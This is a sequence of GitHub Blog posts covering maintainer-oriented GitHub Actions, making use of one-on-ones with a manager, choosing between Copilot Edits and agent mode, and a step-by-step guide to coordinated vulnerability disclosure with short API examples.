2. Let super-linter sweat the small stuff for you

Itā€™s awesome when someone takes the time to submit a pull request to your project. Itā€™s not so awesome when you have to manually reject that pull request because of a small mistake. A linter is a tool that helps you enforce best practices and consistent formatting. Super-linter is a collection of linters for a variety of languages that can automate many of the chores associated with code reviews, including enforcing style guidelines, detecting syntax errors, identifying security vulnerabilities, and ensuring code consistency across multiple languages.

šŸ‘‰ Who uses it: Barman, frankenphp, and more.

3. Stop repeating yourself with create-or-update-comment

Repetitive comments for common scenarios can become tedious. Create-or-update-comment offers a reprieve, enabling you to automate tasks, like sending welcome messages to new contributors or providing standardized feedback when linters and other automated processes detect problems.

šŸ‘‰ Who uses it: woocommerce, lucide, and more.

4. Create release notes with ease with Release Drafter

After all the merging, testing, and other work that goes into preparing a release, writing up the release notes is often the last thing you want to do. The good news: Release Drafter automates the process for you. Each time you merge a pull request, it updates a draft text of your release notes, so theyā€™ll be ready when itā€™s time to publish.

šŸ‘‰ Who uses it: LightGBM, Mealie, and more.

5. Stay organized with pull request labeler

Overwhelmed with PRs? Pull request labeler automatically labels pull requests based on the files or branch modified, helping you triage work and maintain a consistent labeling system.

šŸ‘‰ Who uses it: Apache Lucene, Marvin, and more.

Maintaining an open source project is a labor of love, but with the right tools, it doesnā€™t have to feel overwhelming. These actions are just a few examples of how automation can save time, reduce frustration, and help you focus on writing great code and growing your community.

Why not give them a try and see how they can transform your open source journey? Your future self (and your contributors) will thank you!

Find more actions on GitHub Marketplace.

The post 5 GitHub Actions every maintainer needs to know appeared first on The GitHub Blog.

March 27, 2025  18:31:39

One-on-one meetings with your manager are one of the most valuable tools you have for career growth, problem-solving, and unlocking new opportunities. So if youā€™re only using them to provide status updates, youā€™re leaving a lot on the table.

I didnā€™t fully realize this potential until I mentioned in a one-on-one that I was interested in mentorship and growing my leadership skills. Not long after, I was asked to co-lead a project with an intern to build an internal tool that helped surface enterprise configuration details. This gave me the opportunity to take technical ownership on a project while mentoring someone in a real-world contextā€”both of which pushed me outside my comfort zone in the best way. That experience made it clear: When used intentionally, one-on-ones can open doors you didnā€™t even know were there.

Many engineers treat one-on-ones as a low-stakes standup: reporting work, mentioning blockers, and getting general feedback. While that can be useful, it barely scratches the surface of what these meetings can accomplish. Instead, think of them as a system design review for your roleā€”a time to debug challenges, optimize your workflow, and align on long-term career goals.

Reframing your perception of what a one-on-one can accomplish

A well-structured one-on-one meeting with your manager isnā€™t just a check-in, itā€™s an opportunity to shape your work environment and career trajectory. You wouldnā€™t build a system without evaluating its constraints, dependencies, and long-term maintainability. Why approach your career any differently?

Start by shifting your mindset: These meetings are not status updates. Your manager already sees your pull requests, sprint velocity, and planning docs. Instead, use this time to highlight what mattersā€”what youā€™ve shipped, the value itā€™s delivered, and where the friction is.

You can also use this space to validate decisions and gather context. If youā€™re weighing different paths forward, donā€™t just ask for approvalā€”frame the conversation in terms of trade-offs:

ā€œHere are the pros and cons of refactoring this service now versus later. How does this align with our broader business goals?ā€

Treat your manager like a decision-making API: Feed in the relevant signals, surface whatā€™s unclear, and work together on an informed response.

Use one-on-ones for career versioning (even before youā€™re ā€œreadyā€)

One-on-one meetings are a great time to discuss your long-term career growthā€”even if youā€™re not actively seeking a promotion. Instead of waiting until promotion season, start having these conversations early to build clarity, direction, and momentum over time.

  • If youā€™re more than a year away from seeking a promotion, start talking to your manager about:
    • Where am I already meeting expectations?
    • Where should I focus on strengthening my skills?
  • If youā€™re approaching the next level or considering going up for promotion soon, try focusing the conversation on:
    • What kind of work would demonstrate readiness for the next level?
    • Are there specific opportunities I can take on to grow my scope or visibility?

By treating growth as an iterative process rather than an all-or-nothing milestone, you can continuously improve and course-correct based on early feedback.

A useful framework for structuring these discussions is the Three Circles of Impact:

  1. Individual Contributions ā€“ The direct value of your work.
  2. Collaboration ā€“ How you work with and support others across the team.
  3. Enabling Others ā€“ Mentorship, knowledge sharing, or improving systems and tooling for your peers.

If youā€™re not sure how to show impact across all three, your one-on-one is a great place to explore it. The key is surfacing your goals early so your manager can help guide you toward the kinds of work that will stretch your skills and broaden your influence.

The more you shape your contributions around these areas, the clearer your readiness for growth becomesā€”and the easier it is for your manager to advocate on your behalf.

Your manager canā€™t debug what they donā€™t see

Managers donā€™t have full visibility into your day-to-day experience, so one-on-ones are the right time to highlight persistent blockers and unclear expectations.

For instance, I once brought up a latency issue I was chasing down. The endpointā€™s performance was slightly above our service level objective (SLO) target, and I had already spent a good chunk of time optimizing it. But in that conversation, my manager offered a different lens:

ā€œAre we optimizing for the right thing? We control the SLO. If the extra latency is due to how the system is designed (and if users arenā€™t impacted) maybe the right move is to revisit the threshold instead of squeezing more performance out of it.ā€

That single conversation saved me hours and helped me reframe the problem entirely. Sometimes, the fix isnā€™t in your codeā€”itā€™s in how youā€™re measuring success.

Make your one-on-ones work for you

Your one-on-ones will become far more effectiveā€”and lead to real growthā€”when you treat them as time to think strategically, not just check in. Reframing these meetings around your goals, your environment, and your long-term development puts you in a much stronger position to advocate for yourself and your work.

Start thinking about your career progression earlier than feels natural. Come prepared. Bring in whatā€™s going well, whatā€™s stuck, and where you want to grow. And remember: your manager canā€™t fix what they donā€™t know about, and they canā€™t support your goals if you never share them.

If this shift feels unfamiliar, youā€™re not alone. The Engineerā€™s Survival Guide helped me reframe my thinking around one-on-ones.

Here are a few ideas that stuck with me:

  • Your manager isnā€™t a mind reader.
  • You canā€™t expect guidance if you donā€™t come with a direction.
  • Your growth is a shared effort, but it starts with you.

The earlier you see one-on-ones as a tool for impact and growth, the more value youā€™ll get from them.

The post How engineers can use one-on-ones with their manager to accelerate career growth appeared first on The GitHub Blog.

March 26, 2025  00:18:07

Ever find yourself staring at an AI coding assistant, wondering why itā€™s not quite nailing what you need? Maybe itā€™s spitting out code thatā€™s close but not quite right, or youā€™re stuck wrestling with a problem that spans multiple files, wishing it could just get the bigger picture. Often, when developers hit these snags, itā€™s less about the tool, and more about knowing how to use it.

So hereā€™s the key question you should ask yourself: ā€œDo I need a quick answer or a thoughtful conversation?ā€ Thatā€™s the secret to unlocking AI coding tools like GitHub Copilot.

Because different aspects of Copilot serve different needs, and weā€™re here to help you discern when is the best time for agent mode and when you should be using Copilot Edits instead. Both are powerhouse Copilot features, built to supercharge your coding, but they shine in different scenarios.

Copilot Edits is your go-to for fast, precise tweaksā€”think refactoring a function, squashing a bug, or applying consistent changes across files without losing your flow.

Agent mode, on the other hand, steps up as your AI collaborator for thornier, multi-file challengesā€”analyzing your codebase, proposing architectural fixes, and even running terminal commands while you steer the ship and approve each move.

Figuring out which one fits your needs doesnā€™t just save time, it turns your AI assistant into a seamless extension of your own coding instincts.

Copilot command center: Your chat window

Before learning more about agent mode and Copilot Edits, itā€™s essential to understand the Copilot chat window in VS Codeā€”your central hub for AI interactions.

GitHub Copilot chat interface showing the 'Ask Copilot' panel. The interface displays the Copilot robot logo at the top, followed by 'Ask Copilot' heading. Below that is a disclaimer stating 'Copilot is powered by AI, so mistakes are possible. Review output carefully before use.' The interface includes instructions: 'or type \# to attach context', 'to chat with extensions', and 'Type / to use commands'. At the bottom is a chat input field with the placeholder text 'Ask Copilot' and buttons to add context, with 'GPT-4o' shown as the current model.

This is where you can:

  • Ask coding questions like ā€œHow do I implement JWT authentication in Node.js?ā€
  • Use /explain to understand complex code blocks
  • Debug issues with /fix
  • Generate tests with /tests
  • Access both Edits and agent mode features

With the chat window giving you a solid grasp of your codeā€™s context, youā€™re in the driverā€™s seat to pick the perfect Copilot tool: Edits or agent mode, for whateverā€™s next.

Let me take you through a real-world example of how Iā€™ve been using GitHub Copilot to evolve my personal website. It started with a simple idea: create an interactive terminal-style easter egg that showcases my skills in a developer-friendly way.

I began with a basic command processing function that handled a few simple commands:

function processCommand(command) {
  try {
    if (!command?.trim()) {
      return 'Please enter a command. Type "more" for available commands.';
    }

    const sanitizedCommand = command.toLowerCase().trim();

    switch (sanitizedCommand) {
      case 'more':
        return commands.more;
      case 'about':
        return commands.about;
      case 'skills':
        return commands.skills;
      case 'projects':
        return commands.projects;
      case 'contact':
        return commands.contact;
      default:
        return `Command not found: "${command}". Type 'more' for available commands.`;
    }
  } catch (error) {
    console.error('[Terminal] Error processing command:', error);
    return 'An error occurred while processing the command.';
  }
}

Initially, I used Copilot Edits to quickly add new features. For instance, I wanted to add a ā€˜githubā€™ command to showcase my repositories:

VS Code editor showing a web development project for ag11.dev. The left sidebar displays a file explorer with various components including ContentLinks.astro, DarkModeToggle, and TerminalEasterEgg files. The main editor shows TerminalService.ts file with a COMMANDS object being exported, listing GitHub repositories including github-commenter-raffle, octogatosconf, and dependabot-automation projects. The right sidebar shows GitHub Copilot suggesting steps to add a new 'github' command to the terminal that will display links to repositories. The bottom panel shows a terminal running a development server with local and network URLs. The interface has a dark theme with syntax highlighting in various colors. Add a new command called 'github' to the TerminalEasterEgg that displays links to my GitHub repositories with a short description of each. Update both the processCommand function and the commands object.

Copilot Edits made targeted changes to the switch statement in the processCommand function and added the new command to the commands objectā€”a perfect example of quick, focused modifications to existing code.

As my terminal interface matured, I wanted to implement several interactive features that would require more comprehensive improvements. To get animation effects, keyboard navigation controls, and an extensible theming system that spanned multiple files to work together seamlessly, I turned to agent mode.

The agent mode advantage

When we designed agent mode, we didnā€™t want to create a tool thatā€™s a simple AI feature: We wanted to create an AI that could pair with you! Rather than working on specific, limited changes where you might be reinventing the wheel, youā€™re now providing higher-level direction while the AI tackles the implementation details across multiple files or systems.

That being said, with agent mode, youā€™re still in control of the process. The AI has more latitude to explore your codebase and suggest comprehensive solutions, but you always review and approve the changes before theyā€™re applied. Itā€™s not about surrendering control, itā€™s about effectively delegating implementation details while you focus on the bigger picture.

What makes agent mode special:

  • Codebase search: It searches your codebase to find relevant files without you explicitly specifying them.
  • Self-iteration: It can iterate on its own output to complete your entire request in one go.
  • Error identification and repair: It automatically recognizes and fixes errors in suggested code.
  • Terminal command execution: It suggests and runs terminal commands with your permission.
  • Build and run capabilities: It can build and run your application to check if changes work correctly.

I reach for agent mode when:

  • Building complete features: ā€œAdd analytics tracking throughout the appā€
  • Navigating unfamiliar codebases: ā€œHelp me understand how authentication works in this projectā€
  • Writing and verifying tests: ā€œWrite tests for the UserService and make sure they passā€
  • Implementing terminal-heavy tasks: ā€œSet up a new React project with TypeScript, Redux, and styled-componentsā€
  • Doing complex refactoring: ā€œRefactor our API calls to use the new error handling patternā€

Continuing with my terminal easter egg, letā€™s say I want to implement a much more extensive upgrade with multiple features, like adding a typing animation effect for responses, command history navigation with up/down arrows, and tab completion for commands. At the same time, I want to create a new TerminalThemes.css file with different color scheme options that users can switch between with a ā€˜themeā€™ command.

GitHub Copilot interface showing a chat panel with 'COPILOT EDITS' tab selected. A user named AndreaGriffiths11 (with profile picture) has requested several enhancements to a TerminalEasterEgg component, including adding a typing animation effect for responses, command history navigation with up/down arrows, tab completion for commands, and creating a new TerminalThemes.css file with theme switching options. The interface shows 'TerminalEasterEgg.astro:1-21' as the current file. Below, GitHub Copilot has started responding with 'I'll help enhance the terminal with those features. Let's break this down into steps:' and indicates it 'Used 1 reference'." Enhance our TerminalEasterEgg to include a typing animation effect for responses, add command history navigation with up/down arrows, and implement tab completion for commands. Also create a new TerminalThemes.css file with different color scheme options that users can switch between with a 'theme' command.

This is where agent mode truly shines. The task spans multiple files, requires an understanding of the existing codebase, and involves creating entirely new functionality. Here, agent mode would:

  1. Search through the codebase to understand the terminal implementation.
  2. Create the new CSS file for themes.
  3. Add typing animation functionality to terminal responses.
  4. Implement keyboard handlers for history navigation.
  5. Build the tab completion system.
  6. Add the theme command to the switch statement.
  7. Test the implementation to ensure everything works correctly.

This is the beauty of agent mode: it builds an understanding of the patterns and relationships across different parts of the codebase. Agent mode can ensure that the typing animation doesn't interfere with existing functionality, check that the history navigation is compatible with the current command processing, and confirm that theme switching properly modifies the UI. It is precisely this kind of multi-file feature implementation with interlinked components where agent mode shines compared to the more laser-focused Copilot Edits.

In the below episode of GitHub Checkout, you can see agent mode implementing a complete water consumption tracker feature in an iOS app. It not only writes the code but also builds, runs, and tests the app, all from a single prompt, without the developer needing to touch the editor directly.

The secret: use both together!

After many hours with both tools, hereā€™s my takeaway: Itā€™s not about picking one, or one being better than the other. Itā€™s about wielding them together for different purposes. Copilot Edits and agent mode work well together to augment our coding abilities, whether thatā€™s a more prompt-centric style of development with agent mode, or maintaining granular file edit control via Copilot Edits.

Regardless of which tool you are using, you are still the pilot, steering the AI to supercharge your own productivity. The more context you provide in your prompts, the better results youā€™ll getā€”and remember, you always have the final say on any suggested changes.

If youā€™re just jumping into the world of AI, check out our new Getting started with GitHub Copilot tutorial series, where we walk you through everything from initial setup to advanced techniques. Itā€™s perfect for developers at any skill level who want to quickly become productive with AI-assisted coding.

Happy coding, everyone! šŸ’»āœØ

How to get started

Want to try these features? Hereā€™s my quick setup guide:

For Copilot Edits:

  1. Open VS Code and look for the Copilot Chat window.
  2. Click the ā€œEdit with Copilotā€ button to open the Copilot Edits view.
  3. Add your relevant files to the working set. Copilot will only make changes to files in this set (unless itā€™s creating a new file).
  4. Type your prompt describing what changes you need.
  5. Review the ā€œdiffā€ of all proposed changes before accepting them.

For agent mode:

  1. Make sure youā€™re using VS Code version 1.99 or higher (as of original publish date, available in VS Code Insiders).
  2. Switch from ā€œEditā€ to ā€œAgentā€ mode.
  3. Type your prompt, describing the complex task or feature you want to implement.
  4. Agent mode will work autonomously, but still require your approval for changes.
  5. For best results, consider using custom instructions to personalize how agent mode works with your codebase.

Try GitHub Copilot free
Ready to supercharge your workflows with AI? Learn more about GitHub Copilot for Business or start your free trial of GitHub Enterprise today.

The post Mastering GitHub Copilot: When to use AI agent mode appeared first on The GitHub Blog.

March 24, 2025  16:56:50

Imagine this: Youā€™re sipping your morning coffee and scrolling through your emails, when you spot itā€”a vulnerability report for your open source project. Itā€™s your first one. Panic sets in. What does this mean? Where do you even start?

Many maintainers face this moment without a clear roadmap, but the good news is that handling vulnerability reports doesnā€™t have to be stressful. Below, weā€™ll show you that with the right tools and a step-by-step approach, you can tackle security issues efficiently and confidently.

Letā€™s dig in.

What is vulnerability disclosure?

If you discovered that the lock on your front door was faulty, would you attach a note announcing it to everyone passing by? Of course not! Instead, youā€™d quietly tell the people who need to knowā€”your family or housematesā€”so you can fix it before it becomes a real safety risk.

Thatā€™s exactly how vulnerability disclosure should be handled. Security issues arenā€™t just another bug. They can be a blueprint for attackers if exposed too soon. Instead of discussing them in the open, maintainers should work with security researchers behind the scenes to fix problems before they become public.

This approach, known as Coordinated Vulnerability Disclosure (CVD), keeps your users safe while giving you time to resolve the issue properly.

To support maintainers in this process, GitHub provides tools like Private Vulnerability Reporting (PVR), draft security advisories, and Dependabot alerts. These tools are free to use for open source projects, and are designed to make managing vulnerabilities straightforward and effective.

Letā€™s walk through how to handle vulnerability reports, so that the next time one lands in your inbox, youā€™ll know exactly what to do!

The vulnerability disclosure process, at a glance

Hereā€™s a quick overview of what you should do if you receive a vulnerability report:

  1. Enable Private Vulnerability Reporting (PVR) to handle submissions securely.
  2. Collaborate on a fix: Use draft advisories to plan and test resolutions privately.
  3. Request a Common Vulnerabilities and Exposures (CVE) identifier: Learn how to assign a CVE to your advisory for broader visibility.
  4. Publish the advisory: Notify your community about the issue and the fix.
  5. Notify and protect users: Utilize tools like Dependabot for automated updates.

Now, letā€™s break down each step.

A cartoon bug happily emerging from an open envelope, symbolizing bug reports or vulnerability disclosures.

1. Start securely with PVR

Hereā€™s the thing: There are security researchers out there actively looking for vulnerabilities in open source projects and trying to help. But if they donā€™t know who to report the problem to, itā€™s hard to resolve it. They could post the issue publicly, but this could expose users to attacks before thereā€™s a fix. They could send it to the wrong person and delay the response. Or they could give up and move on.

The best way to ensure these researchers can reach you easily and safely is to turn on GitHubā€™s Private Vulnerability Reporting (PVR).

Think of PVR as a private inbox for security issues. It provides a built-in, confidential way for security researchers to report vulnerabilities directly in your repository.

šŸ”— How to enable PVR for a repository or an organization.

Heads up! By default, maintainers donā€™t receive notifications for new PVR reports, so be sure to update your notification settings so nothing slips through the cracks.

Enhance PVR with a SECURITY.md file

PVR solves the ā€œwhereā€ and the ā€œhowā€ of reporting security issues. But what if you want to set clear expectations from the start? Thatā€™s where a SECURITY.md file comes in handy.

PVR is your front door, and SECURITY.md is your welcome guide telling visitors what to do when they arrive. Without it, researchers might not know whatā€™s in scope, what details you need, or whether their report will be reviewed.

Maintainers are constantly bombarded with requests, making triage difficultā€”especially if reports are vague or missing key details. A well-crafted SECURITY.md helps cut through the noise by defining expectations early. It reassures researchers that their contributions are valued while giving them a clear framework to follow.

A good SECURITY.md file includes:

  • How to report vulnerabilities (ex: ā€œPlease submit reports through PVR.ā€)
  • What information should be included in a report (e.g., steps to reproduce, affected versions, etc.)

Pairing PVR with a clear SECURITY.md file helps you streamline incoming reports more effectively, making it easier for researchers to submit useful details and for you to act on them efficiently.

Three people gathered around a computer screen with puzzled and concerned expressions, discussing something on the screen.

2. Collaborate on a fix: Draft security advisories

Once you confirm the issue is a valid vulnerability, the next step is fixing it without tipping off the wrong people.

But where do you discuss the details? You canā€™t just drop a fix in a public pull request and hope no one notices. If attackers spot the change before the fix is officially released, they can exploit it before users can update.

What youā€™ll need is a private space where you and your collaborators can investigate the issue, work on and test a fix, and then coordinate its release.

GitHub provides that space with draft security advisories. Think of them like a private fork, but specifically for security fixes.

Why use draft security advisories?

  • They keep your discussion private, so that you can work privately with your team or trusted contributors without alerting bad actors.
  • They centralize everything, so your discussions, patches, and plans are kept in a secure workspace.
  • Theyā€™re ready for publishing when you are: You can convert your draft advisory into a public advisory whenever youā€™re ready.

šŸ”— How to create a draft advisory.

By using draft security advisories, you take control of the disclosure timeline, ensuring security issues are fixed before they become public knowledge.
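
Most maintainers will create the draft from the repository's Security tab, but if your workflow is scripted, the repository security advisories REST endpoint can open one for you. A minimal, hedged sketch with placeholder package details:

```python
import os
import requests

OWNER, REPO = "your-org", "your-repo"  # placeholders
HEADERS = {
    "Authorization": f"Bearer {os.environ['GITHUB_TOKEN']}",
    "Accept": "application/vnd.github+json",
    "X-GitHub-Api-Version": "2022-11-28",
}

# Open a draft security advisory; every value below is an illustrative placeholder
draft = {
    "summary": "Path traversal in file upload handler",
    "description": "Crafted filenames can escape the upload directory. Details TBD.",
    "severity": "high",
    "vulnerabilities": [
        {
            "package": {"ecosystem": "npm", "name": "example-package"},
            "vulnerable_version_range": "< 2.4.1",
            "patched_versions": "2.4.1",
        }
    ],
}

resp = requests.post(
    f"https://api.github.com/repos/{OWNER}/{REPO}/security-advisories",
    headers=HEADERS,
    json=draft,
    timeout=10,
)
resp.raise_for_status()
print("Draft advisory:", resp.json()["ghsa_id"])  # keep the GHSA ID for later steps
```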

A stylized illustration of a document labeled 'CVE,' symbolizing a Common Vulnerabilities and Exposures report.

3. Request a CVE with GitHub

Some vulnerabilities are minor, contained issues that can be patched quietly. Others have a broader impact and need to be tracked across the industry.

When a vulnerability needs broader visibility, a Common Vulnerabilities and Exposures (CVE) identifier provides a standardized way to document and reference it. GitHub allows maintainers to request a CVE directly from their draft security advisory, making the process seamless.

What is a CVE, and why does it matter?

A CVE is like a serial number for a security vulnerability. It provides an industry-recognized reference so that developers, security teams, and automated tools can consistently track and respond to vulnerabilities.

Why would you request a CVE?

  • For maintainers, it helps ensure a vulnerability is adequately documented and recognized in security databases.
  • For security researchers, it provides validation that their findings have been acknowledged and recorded.

CVEs are used in security reports, alerts, feeds, and automated security tools. This helps standardize communication between projects, security teams, and end users.

Requesting a CVE doesnā€™t make a vulnerability more or less critical, but it does help ensure that those affected can track and mitigate risks effectively.

šŸ”— How to request a CVE.

Once assigned, the CVE is linked to your advisory but will remain private until you publish it.

By requesting a CVE when appropriate, youā€™re helping improve visibility and coordination across the industry.
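
The request itself is a single action inside the draft advisory, and the REST API exposes the same operation if you automate your release workflow. A sketch with placeholder identifiers (the GHSA ID comes from the draft advisory):

```python
import os
import requests

OWNER, REPO = "your-org", "your-repo"  # placeholders
GHSA_ID = "GHSA-xxxx-xxxx-xxxx"        # the draft advisory's ID

# Ask GitHub (a CVE Numbering Authority) to reserve a CVE for this advisory
resp = requests.post(
    f"https://api.github.com/repos/{OWNER}/{REPO}/security-advisories/{GHSA_ID}/cve",
    headers={
        "Authorization": f"Bearer {os.environ['GITHUB_TOKEN']}",
        "Accept": "application/vnd.github+json",
        "X-GitHub-Api-Version": "2022-11-28",
    },
    timeout=10,
)
resp.raise_for_status()  # 202 Accepted means the CVE request is in progress
```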

A bold, rectangular stamp with the word 'PUBLISHED,' indicating the completion and release of content.

4. Publish the advisory

Good job! Youā€™ve fixed the vulnerability. Now, itā€™s time to let your users know about it. A security advisory does more than just announce an issue. It guides your users on what to do next.

What is a security advisory, and why does it matter?

A security advisory is like a press release for an important update. Itā€™s not just about disclosing a problem, itā€™s about ensuring your users know exactly whatā€™s happening, why it matters, and what they need to do.

A clear and well-written advisory helps to:

  • Inform users: Clearly explain the issue and provide instructions for fixing it.
  • Build trust: Demonstrate accountability and transparency by addressing vulnerabilities proactively.
  • Trigger automated notifications: Tools like GitHub Dependabot use advisories to alert developers whose projects depend on affected versions.

šŸ”— How to publish a security advisory.

Once published, the advisory becomes public in your repository and includes details about the vulnerability and how to fix it.
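
If your release process is scripted, you can publish programmatically as well by updating the draft's state through the same REST endpoint. A hedged sketch, assuming the patched release is already available and using placeholder identifiers:

```python
import os
import requests

OWNER, REPO = "your-org", "your-repo"  # placeholders
GHSA_ID = "GHSA-xxxx-xxxx-xxxx"        # the draft advisory's ID

# Publish the advisory by updating its state; only do this once the fix has shipped
resp = requests.patch(
    f"https://api.github.com/repos/{OWNER}/{REPO}/security-advisories/{GHSA_ID}",
    headers={
        "Authorization": f"Bearer {os.environ['GITHUB_TOKEN']}",
        "Accept": "application/vnd.github+json",
        "X-GitHub-Api-Version": "2022-11-28",
    },
    json={"state": "published"},
    timeout=10,
)
resp.raise_for_status()
print("Published:", resp.json()["html_url"])  # link to the now-public advisory
```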

Best practices for writing an advisory

  • Use plain language: Write in a way thatā€™s easy to understand for both developers and non-technical users
  • Include essential details:
    • A description of the vulnerability and its impact
    • Versions affected by the issue
    • Steps to update, patch, or mitigate the risk
  • Provide helpful resources:
    • Links to patched versions or updated dependencies
    • Workarounds for users who canā€™t immediately apply the fix
    • Additional documentation or best practices

šŸ“Œ Check out this advisory for a well-structured reference.

A well-crafted security advisory is not just a formality. Itā€™s a roadmap that helps your users stay secure. Just as a company would carefully craft a press release for a significant change, your advisory should be clear, reassuring, and actionable. By making security easier to understand, you empower your users to protect themselves and keep their projects safe.

A person typing on a laptop while a small, animated robot (Dependabot) with arms raised in excitement interacts beside them.

5. After publication: Notify and protect users

Publishing your security advisory isnā€™t the finish line. Itā€™s the start of helping your users stay protected. Even the best advisory is only effective if the right people see it and take action.

Beyond publishing the advisory, consider:

  • Announcing it through your usual channels: Blog posts, mailing lists, release notes, and community forums help reach users who may not rely on automated alerts.
  • Documenting it for future users: Someone might adopt your project later without realizing a past version had a security issue. Keep advisories accessible and well-documented.

You should also take advantage of GitHub tools, including:

  • Dependabot alerts
    • Automatically informs developers using affected dependencies
    • Encourages updates by suggesting patched versions
  • Proactive prevention
    • Use scanning tools to find similar problems in different parts of your project. If you find a problem in one area, it might also exist elsewhere
    • Regularly review and update your projectā€™s dependencies to avoid known issues
  • CVE publication and advisory database
    • If you requested a CVE, GitHub will publish the CVE record to CVE.org for industry-wide tracking
    • If eligible, your advisory will also be added to the GitHub Advisory Database, improving visibility for security researchers and developers

Whether through automated alerts or direct communication, making your advisory visible is key to keeping your project and its users secure.
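
You can also keep an eye on alerts programmatically. Here's a small sketch that lists a repository's open Dependabot alerts via the REST API (placeholder names; the token needs permission to read Dependabot alerts):

```python
import os
import requests

OWNER, REPO = "your-org", "your-repo"  # placeholders

# List open Dependabot alerts for a repository
resp = requests.get(
    f"https://api.github.com/repos/{OWNER}/{REPO}/dependabot/alerts",
    headers={
        "Authorization": f"Bearer {os.environ['GITHUB_TOKEN']}",
        "Accept": "application/vnd.github+json",
        "X-GitHub-Api-Version": "2022-11-28",
    },
    params={"state": "open"},
    timeout=10,
)
resp.raise_for_status()

for alert in resp.json():
    advisory = alert["security_advisory"]
    package = alert["dependency"]["package"]["name"]
    print(f'{advisory["ghsa_id"]} ({advisory["severity"]}): {package}')
```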

Next report? Youā€™re ready!

With the right tools and a clear approach, handling vulnerabilities isnā€™t just manageableā€”itā€™s part of running a strong, secure project. So next time a report comes in, take a deep breath. Youā€™ve got this!

Three thought bubblesā€”two filled with question marks and one with light bulbsā€”symbolizing frequently asked questions (FAQ) and the process of finding answers or solutions.

FAQ: Common questions from maintainers

You've got questions? We've got answers! Whether you're handling your first vulnerability report or just want to sharpen your response process, here's what you need to know.

1. Why is Private Vulnerability Reporting (PVR) better than emails or public issues for vulnerability reports?
Great question! At first glance, email or public issue tracking might seem like simple ways to handle vulnerability reports. But PVR is a better choice because it:

  • Keeps things private and secure: PVR ensures that sensitive details stay confidential. No risk of accidental leaks, and no need to juggle security concerns over email.
  • Keeps everything in one place: No more scattered emails or external tools. Everythingā€”discussions, reports, and updatesā€”is neatly stored right in your repository.
  • Makes it easier for researchers: PVR gives researchers a dedicated, structured way to report issues without jumping through hoops.

Bottom line? PVR makes life easier for both maintainers and researchers while keeping security under control.

2. What steps should I take if I receive a vulnerability report that I believe is a false positive?
Not every report is a real security issue, but itā€™s always worth taking a careful look before dismissing it.

  • Double-check details: Sometimes, what seems like a false alarm might be misunderstood. Review the details thoroughly.
  • Ask for more information: Ask clarifying questions or request additional details through GitHubā€™s PVR. Many researchers are happy to provide further context.
  • Check with others: If youā€™re unsure, bring in a team member or a security-savvy friend to help validate the report.
  • Close the loop: If it is a false positive, document your reasoning in the PVR thread. Transparency keeps things professional and builds trust with the researcher.

3. How fast do I need to respond?

  • Acknowledge ASAP: Even if you don't have a fix yet, let the researcher know you got their report. A simple "Thanks, we're looking into it" goes a long way.
  • Follow the 90-day best practice: While there's no hard rule, most security pros aim to address verified vulnerabilities within 90 days.
  • Prioritize by severity: Use the Common Vulnerability Scoring System (CVSS) to gauge urgency and decide what to tackle first.

Think of it this way: No one likes being left in the dark. A quick update keeps researchers engaged and makes collaboration smoother.

4. How do I figure out the severity of a reported vulnerability?
Severity can be tricky, but donā€™t stress! There are tools and approaches that make it easier.

  • Use the CVSS calculator: It gives you a structured way to evaluate the impact and exploitability of a vulnerability.
  • Consider real-world impact: A vulnerability that requires special conditions to exploit might be lower risk, while one that can be triggered easily by any user could be more severe.
  • Collaborate with the reporter: They might have insights on how the issue could be exploited in real-world scenarios.

Take it step by stepā€”itā€™s better to get it right than to rush.
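
As a quick sanity check on whatever the calculator gives you, the CVSS v3.1 qualitative severity bands are easy to encode. A tiny helper:

```python
# Map a CVSS v3.1 base score to its qualitative severity rating
def cvss_severity(score: float) -> str:
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS base scores range from 0.0 to 10.0")
    if score == 0.0:
        return "none"
    if score <= 3.9:
        return "low"
    if score <= 6.9:
        return "medium"
    if score <= 8.9:
        return "high"
    return "critical"

print(cvss_severity(7.5))  # -> high
```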

5. Should I request a CVE before or after publishing an advisory?
Thereā€™s no one-size-fits-all answer, but hereā€™s a simple way to decide:

  • If itā€™s urgent: Publish the advisory first, then request a CVE. CVE assignments can take 1ā€“3 days, and you donā€™t want to delay the fix.
  • For less urgent cases: Request a CVE beforehand to ensure itā€™s included in Dependabot alerts from the start.

Either way, your advisory gets published, and your users stay informed.

6. Where can I learn more about managing vulnerabilities and security practices?
Thereā€™s no need to figure everything out on your own. These resources can help:

Security is an ongoing journey, and every step you take makes your projects stronger. Keep learning, stay proactive, and youā€™ll be in great shape.

Next steps

By taking these steps, youā€™re protecting your project and contributing to a safer and more secure open source ecosystem.

The post A maintainerā€™s guide to vulnerability disclosure: GitHub tools to make it simple appeared first on The GitHub Blog.